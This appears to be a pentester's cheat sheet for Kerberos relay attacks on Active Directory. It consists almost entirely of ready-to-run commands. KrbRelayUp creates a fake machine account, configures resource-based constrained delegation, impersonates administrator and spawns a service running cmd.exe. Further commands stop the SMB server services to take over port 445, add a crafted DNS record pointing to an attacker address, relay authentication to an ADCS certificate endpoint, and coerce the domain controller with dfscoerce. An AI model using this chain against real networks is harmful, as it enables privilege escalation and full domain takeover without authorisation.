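Relay authentication to LDAP(S), automatically create a machine account, and configure resource-based constrained delegation (RBCD). This works only while the domain controller does not enforce LDAP signing and channel binding, and creating the machine account additionally requires a non-zero ms-DS-MachineAccountQuota: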
PS > .\KrbRelayUp.exe RELAY [-d|--Domain megacorp.local] [-dc|--DomainController DC01.megacorp.local] [-m|--Method RBCD] -c|--CreateNewComputerAccount [-cn|--ComputerName FAKEMACHINE$] [-cp|--ComputerPassword Passw0rd!]
PS > .\KrbRelayUp.exe RELAY -u2u -cn j.doe -cp Passw0rd!
PS > .\KrbRelayUp.exe SPAWN [-m|--Method RBCD] [-i|--Impersonate administrator] [-s|ServiceName PwnSVC] [-sc|--ServiceCommand C:\Windows\System32\cmd.exe] -cn|--ComputerName FAKEMACHINE$ -cp|--ComputerPassword Passw0rd! [or -ch|--ComputerPasswordHash fc525c9683e8fe067095ba2ddc971889]
Cmd > sc config LanmanServer start= disabled & sc stop LanmanServer & sc stop srv2 & sc stop srvnet
Cmd > sc config LanmanServer start= auto & sc start LanmanServer & sc start srv2 & sc start srvnet
PS > Invoke-DNSUpdate -DNSName adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -DNSData 10.10.13.37
PS > Set-Service -Name LanmanServer -StartupType Disabled; Stop-Service -Name LanmanServer -Force; Stop-Service -Name srv2 -Force; Stop-Service -Name srvnet -Force
PS > .\KrbRelay.exe -spn HTTP/ADCS.megacorp.local -redirecthost adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 445
$ dfscoerce.py -d megacorp.local -u snovvcrash -k -no-pass adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA DC01.megacorp.local
PS > Set-Service -Name LanmanServer -StartupType Automatic; Start-Service -Name LanmanServer; Start-Service -Name srv2; Start-Service -Name srvnet